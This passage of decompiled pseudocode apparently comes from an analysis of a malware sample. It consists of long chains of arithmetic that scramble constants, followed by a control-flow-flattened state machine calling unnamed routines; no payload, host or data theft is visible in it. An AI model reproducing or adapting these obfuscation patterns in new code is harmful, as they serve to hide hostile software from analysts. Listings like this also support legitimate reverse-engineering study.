                                                                                                                      				unsigned int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				signed int _v432;
                                                                                                                      				signed int _v436;
                                                                                                                      				signed int _v440;
                                                                                                                      				signed int _v444;
                                                                                                                      				signed int _v448;
                                                                                                                      				signed int _v452;
                                                                                                                      				signed int _v456;
                                                                                                                      				signed int _v460;
                                                                                                                      				signed int _v464;
                                                                                                                      				signed int _v468;
                                                                                                                      				signed int _v472;
                                                                                                                      				signed int _v476;
                                                                                                                      				signed int _v480;
                                                                                                                      				unsigned int _v484;
                                                                                                                      				unsigned int _v488;
                                                                                                                      				signed int _v492;
                                                                                                                      				signed int _v496;
                                                                                                                      				signed int _v500;
                                                                                                                      				signed int _v504;
                                                                                                                      				signed int _v508;
                                                                                                                      				unsigned int _v512;
                                                                                                                      				signed int _v516;
                                                                                                                      				signed int _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				unsigned int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				unsigned int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				unsigned int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				unsigned int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				unsigned int _v588;
                                                                                                                      				unsigned int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _t1114;
                                                                                                                      				signed int _t1118;
                                                                                                                      				signed int _t1122;
                                                                                                                      				signed int _t1124;
                                                                                                                      				signed int _t1125;
                                                                                                                      				signed int _t1130;
                                                                                                                      				void* _t1134;
                                                                                                                      				signed int _t1141;
                                                                                                                      				signed int _t1190;
                                                                                                                      				signed int _t1191;
                                                                                                                      				signed int _t1193;
                                                                                                                      				signed int _t1194;
                                                                                                                      				signed int _t1195;
                                                                                                                      				signed int _t1196;
                                                                                                                      				signed int _t1197;
                                                                                                                      				signed int _t1198;
                                                                                                                      				signed int _t1199;
                                                                                                                      				signed int _t1200;
                                                                                                                      				signed int _t1201;
                                                                                                                      				signed int _t1202;
                                                                                                                      				signed int _t1203;
                                                                                                                      				signed int _t1204;
                                                                                                                      				signed int _t1205;
                                                                                                                      				signed int _t1206;
                                                                                                                      				signed int _t1207;
                                                                                                                      				signed int _t1208;
                                                                                                                      				signed int _t1209;
                                                                                                                      				signed int _t1210;
                                                                                                                      				signed int _t1211;
                                                                                                                      				signed int _t1212;
                                                                                                                      				signed int _t1213;
                                                                                                                      				signed int _t1214;
                                                                                                                      				signed int _t1215;
                                                                                                                      				signed int _t1313;
                                                                                                                      				signed int _t1314;
                                                                                                                      				signed int _t1317;
                                                                                                                      				signed int _t1343;
                                                                                                                      				void* _t1345;
                                                                                                                      				void* _t1348;
                                                                                                                      				void* _t1349;
                                                                                                                      				void* _t1350;
                                                                                                                      
                                                                                                                      				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
                                                                                                                      				_v372 = 0xaca17;
                                                                                                                      				_v372 = _v372 << 9;
                                                                                                                      				_v372 = _v372 ^ 0xc9927700;
                                                                                                                      				_v372 = _v372 ^ 0xdc065802;
                                                                                                                      				_v560 = 0xa158a0;
                                                                                                                      				_v560 = _v560 + 0xffff5dcd;
                                                                                                                      				_v560 = _v560 ^ 0x175bafac;
                                                                                                                      				_v560 = _v560 + 0xffff9e49;
                                                                                                                      				_v560 = _v560 ^ 0x17fab80a;
                                                                                                                      				_v288 = 0xd4a9a6;
                                                                                                                      				_v288 = _v288 >> 3;
                                                                                                                      				_v288 = _v288 ^ 0x001a9534;
                                                                                                                      				_v504 = 0xe9a5d3;
                                                                                                                      				_v504 = _v504 << 0xa;
                                                                                                                      				_v504 = _v504 | 0xea5982c0;
                                                                                                                      				_t1190 = 0x5f;
                                                                                                                      				_v504 = _v504 / _t1190;
                                                                                                                      				_v504 = _v504 ^ 0x028f5db6;
                                                                                                                      				_t1317 = 0x5d794ec;
                                                                                                                      				_v304 = 0x85b0a3;
                                                                                                                      				_v304 = _v304 | 0x2bca024a;
                                                                                                                      				_v304 = _v304 ^ 0x2bcc012b;
                                                                                                                      				_v556 = 0x1ecc82;
                                                                                                                      				_v556 = _v556 | 0xf08df0d8;
                                                                                                                      				_v556 = _v556 + 0xa531;
                                                                                                                      				_v556 = _v556 ^ 0xfe698427;
                                                                                                                      				_v556 = _v556 ^ 0x0ecdaa65;
                                                                                                                      				_v300 = 0x8f610e;
                                                                                                                      				_v300 = _v300 + 0xfe33;
                                                                                                                      				_v300 = _v300 ^ 0x0094e207;
                                                                                                                      				_v600 = 0x1cab4a;
                                                                                                                      				_t1193 = 0x18;
                                                                                                                      				_v600 = _v600 / _t1193;
                                                                                                                      				_v600 = _v600 + 0xffff3801;
                                                                                                                      				_v600 = _v600 + 0x515c;
                                                                                                                      				_v600 = _v600 ^ 0x0001e7c9;
                                                                                                                      				_v568 = 0xbab742;
                                                                                                                      				_v568 = _v568 + 0xcc5d;
                                                                                                                      				_v568 = _v568 | 0x5c48aa02;
                                                                                                                      				_t1194 = 0x5e;
                                                                                                                      				_v568 = _v568 / _t1194;
                                                                                                                      				_v568 = _v568 ^ 0x00f9db2d;
                                                                                                                      				_v576 = 0x767b63;
                                                                                                                      				_v576 = _v576 >> 3;
                                                                                                                      				_v576 = _v576 + 0xd487;
                                                                                                                      				_v576 = _v576 >> 0x10;
                                                                                                                      				_v576 = _v576 ^ 0x00061026;
                                                                                                                      				_v628 = 0xe4759e;
                                                                                                                      				_v628 = _v628 ^ 0xa26bb658;
                                                                                                                      				_v628 = _v628 * 0x1d;
                                                                                                                      				_v628 = _v628 ^ 0xba259216;
                                                                                                                      				_v628 = _v628 ^ 0xd068fc76;
                                                                                                                      				_v500 = 0xe51d81;
                                                                                                                      				_v500 = _v500 >> 7;
                                                                                                                      				_v500 = _v500 + 0xc085;
                                                                                                                      				_v500 = _v500 * 0x6e;
                                                                                                                      				_v500 = _v500 ^ 0x01113a52;
                                                                                                                      				_v512 = 0xc902c8;
                                                                                                                      				_v512 = _v512 >> 3;
                                                                                                                      				_v512 = _v512 >> 3;
                                                                                                                      				_v512 = _v512 >> 7;
                                                                                                                      				_v512 = _v512 ^ 0x0003c164;
                                                                                                                      				_v532 = 0xda62af;
                                                                                                                      				_v532 = _v532 ^ 0x7c695b99;
                                                                                                                      				_v532 = _v532 >> 0xd;
                                                                                                                      				_v532 = _v532 >> 6;
                                                                                                                      				_v532 = _v532 ^ 0x0009f043;
                                                                                                                      				_v604 = 0x69f539;
                                                                                                                      				_v604 = _v604 << 0xd;
                                                                                                                      				_v604 = _v604 + 0xffffd530;
                                                                                                                      				_v604 = _v604 + 0xffffaf77;
                                                                                                                      				_v604 = _v604 ^ 0x3ead80db;
                                                                                                                      				_v384 = 0xab9f19;
                                                                                                                      				_t1195 = 0xf;
                                                                                                                      				_t1313 = 0x50;
                                                                                                                      				_v384 = _v384 * 0x15;
                                                                                                                      				_v384 = _v384 * 9;
                                                                                                                      				_v384 = _v384 ^ 0x7eb18135;
                                                                                                                      				_v256 = 0xb5a6bd;
                                                                                                                      				_v256 = _v256 | 0x1f71a96d;
                                                                                                                      				_v256 = _v256 ^ 0x1ffe1878;
                                                                                                                      				_v264 = 0xca80f7;
                                                                                                                      				_v264 = _v264 ^ 0x226a3f90;
                                                                                                                      				_v264 = _v264 ^ 0x22af4e12;
                                                                                                                      				_v432 = 0x1b5a57;
                                                                                                                      				_v432 = _v432 << 0xa;
                                                                                                                      				_v432 = _v432 | 0x8c1547fb;
                                                                                                                      				_v432 = _v432 ^ 0xed77fd98;
                                                                                                                      				_v312 = 0xf59d00;
                                                                                                                      				_v312 = _v312 | 0xee7978e1;
                                                                                                                      				_v312 = _v312 ^ 0xeef23383;
                                                                                                                      				_v608 = 0x388a49;
                                                                                                                      				_v608 = _v608 ^ 0x20b0147d;
                                                                                                                      				_v608 = _v608 | 0x120a0452;
                                                                                                                      				_v608 = _v608 / _t1195;
                                                                                                                      				_v608 = _v608 ^ 0x035d442e;
                                                                                                                      				_v632 = 0x8bfb5e;
                                                                                                                      				_v632 = _v632 / _t1313;
                                                                                                                      				_v632 = _v632 | 0x8005d6ab;
                                                                                                                      				_v632 = _v632 + 0xbf6f;
                                                                                                                      				_v632 = _v632 ^ 0x80035879;
                                                                                                                      				_v624 = 0xe5ec6;
                                                                                                                      				_v624 = _v624 << 2;
                                                                                                                      				_v624 = _v624 >> 9;
                                                                                                                      				_v624 = _v624 | 0xadaec6d6;
                                                                                                                      				_v624 = _v624 ^ 0xada90310;
                                                                                                                      				_v392 = 0x144ef;
                                                                                                                      				_t1196 = 0x44;
                                                                                                                      				_v392 = _v392 / _t1196;
                                                                                                                      				_v392 = _v392 + 0xc90b;
                                                                                                                      				_v392 = _v392 ^ 0x0000cf97;
                                                                                                                      				_v236 = 0xf3d10d;
                                                                                                                      				_t1197 = 0x4a;
                                                                                                                      				_v236 = _v236 * 0x7a;
                                                                                                                      				_v236 = _v236 ^ 0x74330487;
                                                                                                                      				_v324 = 0xc3c34b;
                                                                                                                      				_v324 = _v324 * 0x6c;
                                                                                                                      				_v324 = _v324 ^ 0x529af392;
                                                                                                                      				_v520 = 0x2a70ca;
                                                                                                                      				_v520 = _v520 / _t1197;
                                                                                                                      				_v520 = _v520 >> 4;
                                                                                                                      				_v520 = _v520 ^ 0x2a4d5a72;
                                                                                                                      				_v520 = _v520 ^ 0x2a4dbf28;
                                                                                                                      				_v340 = 0xc9c056;
                                                                                                                      				_t1198 = 7;
                                                                                                                      				_v340 = _v340 * 0x23;
                                                                                                                      				_v340 = _v340 | 0xe2238341;
                                                                                                                      				_v340 = _v340 ^ 0xfbb710ef;
                                                                                                                      				_v248 = 0x9a54c0;
                                                                                                                      				_v248 = _v248 | 0xe08ac880;
                                                                                                                      				_v248 = _v248 ^ 0xe09bcbd4;
                                                                                                                      				_v348 = 0xe0760;
                                                                                                                      				_v348 = _v348 << 7;
                                                                                                                      				_v348 = _v348 + 0x49a3;
                                                                                                                      				_v348 = _v348 ^ 0x070edb7d;
                                                                                                                      				_v356 = 0xf94015;
                                                                                                                      				_v356 = _v356 * 0x4d;
                                                                                                                      				_v356 = _v356 << 1;
                                                                                                                      				_v356 = _v356 ^ 0x95f7b4be;
                                                                                                                      				_v320 = 0x1268a5;
                                                                                                                      				_v320 = _v320 / _t1198;
                                                                                                                      				_v320 = _v320 ^ 0x00080ceb;
                                                                                                                      				_v396 = 0xbdcf3e;
                                                                                                                      				_t1199 = 0x4b;
                                                                                                                      				_v396 = _v396 * 0x4d;
                                                                                                                      				_v396 = _v396 >> 2;
                                                                                                                      				_v396 = _v396 ^ 0x0e48dd39;
                                                                                                                      				_v596 = 0x7780dd;
                                                                                                                      				_v596 = _v596 << 0xd;
                                                                                                                      				_v596 = _v596 | 0xdff7e7fd;
                                                                                                                      				_v596 = _v596 ^ 0xfff000ad;
                                                                                                                      				_v492 = 0x5c66b3;
                                                                                                                      				_v492 = _v492 * 0x2a;
                                                                                                                      				_v492 = _v492 ^ 0xe8f32aee;
                                                                                                                      				_v492 = _v492 >> 0xd;
                                                                                                                      				_v492 = _v492 ^ 0x000eb956;
                                                                                                                      				_v316 = 0x3e4fae;
                                                                                                                      				_v316 = _v316 >> 3;
                                                                                                                      				_v316 = _v316 ^ 0x00075837;
                                                                                                                      				_v344 = 0xe0dcd8;
                                                                                                                      				_v344 = _v344 >> 1;
                                                                                                                      				_v344 = _v344 + 0xffff4400;
                                                                                                                      				_v344 = _v344 ^ 0x0066aca9;
                                                                                                                      				_v460 = 0xbe16e8;
                                                                                                                      				_v460 = _v460 * 0x45;
                                                                                                                      				_v460 = _v460 ^ 0x56f71a5b;
                                                                                                                      				_v460 = _v460 / _t1199;
                                                                                                                      				_v460 = _v460 ^ 0x0158823c;
                                                                                                                      				_v588 = 0x54b44f;
                                                                                                                      				_v588 = _v588 ^ 0xc5cf08f3;
                                                                                                                      				_v588 = _v588 ^ 0x4b1db793;
                                                                                                                      				_v588 = _v588 >> 0xb;
                                                                                                                      				_v588 = _v588 ^ 0x00183ace;
                                                                                                                      				_v524 = 0xbfc9bb;
                                                                                                                      				_t1200 = 0x67;
                                                                                                                      				_v524 = _v524 * 0x4d;
                                                                                                                      				_v524 = _v524 * 0x71;
                                                                                                                      				_v524 = _v524 << 1;
                                                                                                                      				_v524 = _v524 ^ 0xed1ab829;
                                                                                                                      				_v376 = 0x55c29;
                                                                                                                      				_v376 = _v376 << 0xc;
                                                                                                                      				_v376 = _v376 ^ 0xdae248eb;
                                                                                                                      				_v376 = _v376 ^ 0x8f2c7d73;
                                                                                                                      				_v424 = 0x330008;
                                                                                                                      				_v424 = _v424 << 0xb;
                                                                                                                      				_v424 = _v424 / _t1200;
                                                                                                                      				_v424 = _v424 ^ 0x017d7462;
                                                                                                                      				_v580 = 0xb4c97;
                                                                                                                      				_v580 = _v580 | 0x569d8b1e;
                                                                                                                      				_v580 = _v580 >> 1;
                                                                                                                      				_t1201 = 3;
                                                                                                                      				_v580 = _v580 / _t1201;
                                                                                                                      				_v580 = _v580 ^ 0x0e68230a;
                                                                                                                      				_v328 = 0x695dff;
                                                                                                                      				_v328 = _v328 ^ 0x424f14af;
                                                                                                                      				_v328 = _v328 ^ 0x4224025c;
                                                                                                                      				_v284 = 0xae8351;
                                                                                                                      				_t1202 = 0x57;
                                                                                                                      				_v284 = _v284 * 0x60;
                                                                                                                      				_v284 = _v284 ^ 0x417e5081;
                                                                                                                      				_v444 = 0x78eba1;
                                                                                                                      				_v444 = _v444 * 0x5f;
                                                                                                                      				_v444 = _v444 ^ 0x00193e0b;
                                                                                                                      				_v444 = _v444 ^ 0x2cc98685;
                                                                                                                      				_v592 = 0x15a443;
                                                                                                                      				_v592 = _v592 / _t1202;
                                                                                                                      				_v592 = _v592 + 0xffff9c6f;
                                                                                                                      				_v592 = _v592 >> 5;
                                                                                                                      				_v592 = _v592 ^ 0x07f20231;
                                                                                                                      				_v216 = 0x5d0672;
                                                                                                                      				_v216 = _v216 << 3;
                                                                                                                      				_v216 = _v216 ^ 0x02ee7d7e;
                                                                                                                      				_v548 = 0xb50861;
                                                                                                                      				_v548 = _v548 >> 0xc;
                                                                                                                      				_v548 = _v548 << 0xf;
                                                                                                                      				_v548 = _v548 + 0xffffef54;
                                                                                                                      				_v548 = _v548 ^ 0x05ac6923;
                                                                                                                      				_v452 = 0x2163b6;
                                                                                                                      				_v452 = _v452 | 0xbb60e7c3;
                                                                                                                      				_v452 = _v452 ^ 0x0d3b8c6d;
                                                                                                                      				_v452 = _v452 ^ 0xb65710e5;
                                                                                                                      				_v636 = 0x61f3a7;
                                                                                                                      				_v636 = _v636 + 0xffff300f;
                                                                                                                      				_v636 = _v636 << 1;
                                                                                                                      				_v636 = _v636 * 0x27;
                                                                                                                      				_v636 = _v636 ^ 0x1d9bc7e7;
                                                                                                                      				_v224 = 0x725254;
                                                                                                                      				_v224 = _v224 + 0xfffffac1;
                                                                                                                      				_v224 = _v224 ^ 0x007e9bc6;
                                                                                                                      				_v228 = 0xd6200c;
                                                                                                                      				_v228 = _v228 ^ 0x5ef32346;
                                                                                                                      				_v228 = _v228 ^ 0x5e2a0e2d;
                                                                                                                      				_v540 = 0xc12668;
                                                                                                                      				_v540 = _v540 << 8;
                                                                                                                      				_v540 = _v540 * 0x51;
                                                                                                                      				_v540 = _v540 + 0xffff6981;
                                                                                                                      				_v540 = _v540 ^ 0x1d2c502d;
                                                                                                                      				_v496 = 0x68726f;
                                                                                                                      				_v496 = _v496 + 0xb8c4;
                                                                                                                      				_v496 = _v496 + 0xffff3269;
                                                                                                                      				_v496 = _v496 << 1;
                                                                                                                      				_v496 = _v496 ^ 0x00d37668;
                                                                                                                      				_v296 = 0x65f16b;
                                                                                                                      				_v296 = _v296 ^ 0xac840f83;
                                                                                                                      				_v296 = _v296 ^ 0xace8f4ad;
                                                                                                                      				_v336 = 0xf34185;
                                                                                                                      				_v336 = _v336 + 0xffff7084;
                                                                                                                      				_v336 = _v336 ^ 0x22f89925;
                                                                                                                      				_v336 = _v336 ^ 0x2207d32f;
                                                                                                                      				_v400 = 0x9220b0;
                                                                                                                      				_v400 = _v400 | 0xa2c46701;
                                                                                                                      				_v400 = _v400 + 0x1a14;
                                                                                                                      				_v400 = _v400 ^ 0xa2d5ce26;
                                                                                                                      				_v368 = 0x18190f;
                                                                                                                      				_v368 = _v368 * 0x6c;
                                                                                                                      				_t1203 = 0x47;
                                                                                                                      				_v368 = _v368 * 0x49;
                                                                                                                      				_v368 = _v368 ^ 0xe62bbbec;
                                                                                                                      				_v276 = 0x664929;
                                                                                                                      				_v276 = _v276 + 0xffffab3c;
                                                                                                                      				_v276 = _v276 ^ 0x0066f8be;
                                                                                                                      				_v420 = 0x55fac4;
                                                                                                                      				_v420 = _v420 / _t1203;
                                                                                                                      				_v420 = _v420 | 0x23698c02;
                                                                                                                      				_v420 = _v420 ^ 0x23676b12;
                                                                                                                      				_v428 = 0x2d8f3d;
                                                                                                                      				_v428 = _v428 ^ 0xcbbc8554;
                                                                                                                      				_v428 = _v428 + 0xffff5f5b;
                                                                                                                      				_v428 = _v428 ^ 0xcb969d3b;
                                                                                                                      				_v408 = 0x7d0ed3;
                                                                                                                      				_t1204 = 0x33;
                                                                                                                      				_v408 = _v408 / _t1204;
                                                                                                                      				_v408 = _v408 ^ 0x03ccba73;
                                                                                                                      				_v408 = _v408 ^ 0x03c41a74;
                                                                                                                      				_v212 = 0xf1bcf;
                                                                                                                      				_v212 = _v212 | 0xafbe7d4b;
                                                                                                                      				_v212 = _v212 ^ 0xafbe5483;
                                                                                                                      				_v476 = 0x76a0ac;
                                                                                                                      				_v476 = _v476 << 0xa;
                                                                                                                      				_v476 = _v476 << 2;
                                                                                                                      				_v476 = _v476 >> 6;
				_v476 = _v476 ^ 0x01aadd1c;
				_v252 = 0xacd74c;
				_v252 = _v252 + 0xffffc13c;
				_v252 = _v252 ^ 0x00a0cd5e;
				_v232 = 0x48ff42;
				_t1205 = 0x1a;
				_v232 = _v232 / _t1205;
				_v232 = _v232 ^ 0x0005b06f;
				_v620 = 0x68b0f8;
				_v620 = _v620 | 0x9e72bceb;
				_v620 = _v620 ^ 0x53ebce50;
				_v620 = _v620 + 0x60e9;
				_v620 = _v620 ^ 0xcd9386df;
				_v572 = 0xa5dd6d;
				_v572 = _v572 << 0xb;
				_t1206 = 0x6b;
				_v572 = _v572 / _t1206;
				_v572 = _v572 + 0xe547;
				_v572 = _v572 ^ 0x00701f50;
				_v516 = 0x27ee1e;
				_v516 = _v516 + 0x5114;
				_v516 = _v516 ^ 0xd07a9b41;
				_v516 = _v516 ^ 0x4a8a2a52;
				_v516 = _v516 ^ 0x9ad4de84;
				_v484 = 0xc04b63;
				_v484 = _v484 >> 3;
				_v484 = _v484 >> 4;
				_v484 = _v484 + 0xffff6956;
				_v484 = _v484 ^ 0x000f5fa9;
				_v416 = 0x10eb88;
				_v416 = _v416 | 0xd8fa91ef;
				_v416 = _v416 ^ 0xf957ef44;
				_v416 = _v416 ^ 0x21a34ff6;
				_v412 = 0xf4f2f5;
				_v412 = _v412 + 0xffff8ffc;
				_v412 = _v412 + 0xffff7090;
				_v412 = _v412 ^ 0x00f029cf;
				_v268 = 0xc7943e;
				_v268 = _v268 << 0x10;
				_v268 = _v268 ^ 0x94371f3e;
				_v544 = 0x509d95;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 >> 0xf;
				_v544 = _v544 >> 0xa;
				_v544 = _v544 ^ 0x0008d406;
				_v552 = 0x34f7be;
				_v552 = _v552 / _t1190;
				_v552 = _v552 >> 0x10;
				_v552 = _v552 >> 5;
				_v552 = _v552 ^ 0x0008c95b;
				_v404 = 0x94eb91;
				_v404 = _v404 ^ 0x41984e3b;
				_v404 = _v404 << 3;
				_v404 = _v404 ^ 0x08661611;
				_v220 = 0x500384;
				_v220 = _v220 ^ 0xbbdae5ed;
				_v220 = _v220 ^ 0xbb8779fc;
				_v448 = 0x89f4a;
				_t1207 = 0x66;
				_v448 = _v448 * 0x78;
				_v448 = _v448 / _t1313;
				_v448 = _v448 ^ 0x000df59a;
				_v292 = 0x19f8d0;
				_v292 = _v292 >> 0xf;
				_v292 = _v292 ^ 0x0007f69a;
				_v616 = 0x49d3c1;
				_v616 = _v616 | 0x94d46b10;
				_v616 = _v616 >> 0xe;
				_v616 = _v616 | 0x382c489e;
				_v616 = _v616 ^ 0x382cb35c;
				_v440 = 0x57429d;
				_v440 = _v440 << 0x10;
				_v440 = _v440 + 0x8d95;
				_v440 = _v440 ^ 0x429b4669;
				_v612 = 0x469ad0;
				_v612 = _v612 ^ 0xa9c1a766;
				_v612 = _v612 | 0x8fd1d886;
				_v612 = _v612 << 1;
				_v612 = _v612 ^ 0x5faedd57;
				_v244 = 0xe276bf;
				_v244 = _v244 * 0x1a;
				_v244 = _v244 ^ 0x170afa50;
				_v352 = 0x60bcf5;
				_v352 = _v352 + 0xf9c7;
				_v352 = _v352 ^ 0xebf612c1;
				_v352 = _v352 ^ 0xeb9276cf;
				_v488 = 0xa1517b;
				_v488 = _v488 / _t1207;
				_t1208 = 0x68;
				_v488 = _v488 * 0x65;
				_v488 = _v488 >> 0xc;
				_v488 = _v488 ^ 0x00034996;
				_v388 = 0x73cbfd;
				_v388 = _v388 << 5;
				_v388 = _v388 / _t1208;
				_v388 = _v388 ^ 0x002375e2;
				_v480 = 0x418d4e;
				_v480 = _v480 + 0xffffa3b5;
				_v480 = _v480 + 0x7686;
				_v480 = _v480 << 6;
				_v480 = _v480 ^ 0x106d4c13;
				_v380 = 0xc2a320;
				_t1209 = 0x12;
				_v380 = _v380 / _t1209;
				_t1210 = 0x3b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x02970ee8;
				_v272 = 0xffa302;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0xfd1abd55;
				_v280 = 0x15da71;
				_v280 = _v280 | 0xb4bf3799;
				_v280 = _v280 ^ 0xb4b9b38f;
				_v364 = 0xb2440c;
				_v364 = _v364 >> 0xb;
				_v364 = _v364 ^ 0x4809a963;
				_v364 = _v364 ^ 0x4806c3ec;
				_v472 = 0xfa5982;
				_v472 = _v472 * 0x42;
				_v472 = _v472 | 0xea19613e;
				_v472 = _v472 + 0x3c8a;
				_v472 = _v472 ^ 0xea9293e6;
				_v464 = 0xd5ed68;
				_v464 = _v464 << 3;
				_v464 = _v464 << 0x10;
				_v464 = _v464 << 0xc;
				_v464 = _v464 ^ 0x00064bb9;
				_v240 = 0xe6b6f4;
				_v240 = _v240 + 0xffffaad8;
				_v240 = _v240 ^ 0x00e3249b;
				_v360 = 0x591b06;
				_v360 = _v360 / _t1210;
				_v360 = _v360 ^ 0x000e8e51;
				_v456 = 0xd9b586;
				_v456 = _v456 << 7;
				_t1211 = 0x77;
				_v456 = _v456 / _t1211;
				_v456 = _v456 ^ 0x2d3aa422;
				_v456 = _v456 ^ 0x2dd2b0e0;
				_v468 = 0xee071b;
				_t1212 = 0x17;
				_v468 = _v468 / _t1212;
				_v468 = _v468 + 0xffff215c;
				_t1213 = 0x1e;
				_v468 = _v468 / _t1213;
				_v468 = _v468 ^ 0x01343549;
				_v508 = 0x51d736;
				_v508 = _v508 ^ 0xe0f7e333;
				_v508 = _v508 ^ 0x46175d01;
				_v508 = _v508 << 0xb;
				_v508 = _v508 ^ 0x8b480710;
				_v332 = 0x8a6fa0;
				_v332 = _v332 << 4;
				_v332 = _v332 * 0x66;
				_v332 = _v332 ^ 0x72879c01;
				_v436 = 0x22afa8;
				_v436 = _v436 ^ 0xb7db44c6;
				_v436 = _v436 + 0x54fa;
				_v436 = _v436 ^ 0xb7fa4fc8;
				_v584 = 0x2b296e;
				_t833 =  &_v584; // 0x2b296e
				_t1214 = 0x7d;
				_t1314 = _v360;
				_v584 =  *_t833 * 0x69;
				_v584 = _v584 ^ 0x4f8ca6ed;
				_v584 = _v584 + 0xffff6423;
				_v584 = _v584 ^ 0x5e3ea256;
				_v564 = 0x8d053b;
				_t1191 = _v360;
				_v564 = _v564 * 0x58;
				_v564 = _v564 >> 0xa;
				_v564 = _v564 / _t1214;
				_v564 = _v564 ^ 0x000da371;
				_v208 = 0xe7280f;
				_v208 = _v208 << 4;
				_v208 = _v208 ^ 0x0e7f3b50;
				_v308 = 0xd716a5;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x35cb5d60;
				_v260 = 0x2bcd88;
				_t1215 = 0x69;
				_v260 = _v260 * 0x56;
				_v260 = _v260 ^ 0x0eb9ff90;
				_v536 = 0x561f85;
				_v536 = _v536 + 0x28c2;
				_v536 = _v536 ^ 0x7eb81cd4;
				_v536 = _v536 + 0xfffffcfb;
				_v536 = _v536 ^ 0x7eee24be;
				_v528 = 0xd9e61a;
				_v528 = _v528 | 0x5cf69c57;
				_v528 = _v528 / _t1215;
				_v528 = _v528 * 0x70;
				_v528 = _v528 ^ 0x6333db70;
				goto L1;
				do {
					while(1) {
						L1:
						_t1348 = _t1317 - 0x6397bd0;
						if(_t1348 > 0) {
							break;
						}
						if(_t1348 == 0) {
							E006966CA();
							_t1317 = 0x525d695;
							continue;
						}
						_t1349 = _t1317 - 0x3d71c3c;
						if(_t1349 > 0) {
							__eflags = _t1317 - 0x525d695;
							if(__eflags > 0) {
								__eflags = _t1317 - 0x53c3717;
								if(_t1317 == 0x53c3717) {
									_t1118 = E00691FFB();
									__eflags = _t1118;
									if(_t1118 == 0) {
										_t1125 = E006A0056();
									}
									L27:
									_t1317 = 0xc4dcd;
									continue;
								}
								__eflags = _t1317 - 0x56efd44;
								if(_t1317 == 0x56efd44) {
									E006995FA();
									_t1122 = E00691FFB();
									asm("sbb esi, esi");
									_t1317 = ( ~_t1122 & 0xfebaa250) + 0x8c1c67e;
									continue;
								}
								__eflags = _t1317 - 0x5d794ec;
								if(_t1317 == 0x5d794ec) {
									_t1317 = 0xd7f216f;
									continue;
								}
								__eflags = _t1317 - 0x5dcd6da;
								if(_t1317 != 0x5dcd6da) {
									goto L109;
								}
								_t1125 = E0069C110(_v336,  &_v152, _v400, _v368);
								_t1317 = 0x6eeee91;
								continue;
							}
							if(__eflags == 0) {
								_t1125 = E006859F2();
								__eflags = _t1125;
								if(_t1125 == 0) {
									L114:
									return _t1125;
								}
								_t1317 = 0x56efd44;
								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0x3fc5519;
                                                                                                                      							if(_t1317 == 0x3fc5519) {
                                                                                                                      								_v144 = E006920B0();
                                                                                                                      								_t1125 = E00691DDD(_v452, _t1152, _v636, _v224);
                                                                                                                      								_pop(_t1237);
                                                                                                                      								_v140 = _t1125;
                                                                                                                      								_t1317 = 0xa74297b;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0x42dc4f0;
                                                                                                                      							if(_t1317 == 0x42dc4f0) {
                                                                                                                      								_t1125 = _v468;
                                                                                                                      								_t1317 = 0x4cdd8ae;
                                                                                                                      								_v112 = _t1125;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0x4a24b69;
                                                                                                                      							if(_t1317 == 0x4a24b69) {
                                                                                                                      								_t1125 = E00690326();
                                                                                                                      								_t1317 = 0x8690ed6;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0x4cdd8ae;
                                                                                                                      							if(_t1317 != 0x4cdd8ae) {
                                                                                                                      								goto L109;
                                                                                                                      							}
                                                                                                                      							_t1125 = _v508;
                                                                                                                      							_t1317 = 0x5dcd6da;
                                                                                                                      							_v124 = _t1125;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1349 == 0) {
                                                                                                                      							E00698519(_v244, _v352, _v188);
                                                                                                                      							L34:
                                                                                                                      							_t1317 = 0xe4333b3;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t1350 = _t1317 - 0x27d9d92;
                                                                                                                      						if(_t1350 > 0) {
                                                                                                                      							__eflags = _t1317 - 0x2a998d8;
                                                                                                                      							if(_t1317 == 0x2a998d8) {
                                                                                                                      								_t1124 = E00681A56( &_v180,  &_v84, _v572, _v516);
                                                                                                                      								__eflags = _t1124;
                                                                                                                      								if(_t1124 != 0) {
                                                                                                                      									_t1125 = _v28;
                                                                                                                      									__eflags = _t1125 - 8;
                                                                                                                      									if(_t1125 != 8) {
                                                                                                                      										__eflags = _t1125;
                                                                                                                      										if(_t1125 == 0) {
                                                                                                                      											L32:
                                                                                                                      											_t1317 = 0xa65551a;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      										__eflags = _t1125 - 1;
                                                                                                                      										if(_t1125 != 1) {
                                                                                                                      											goto L27;
                                                                                                                      										}
                                                                                                                      										goto L32;
                                                                                                                      									}
                                                                                                                      									_t1317 = 0xc1a4fe5;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								_t1125 = E00690AE0(_v308, _v564);
                                                                                                                      								_pop(_t1237);
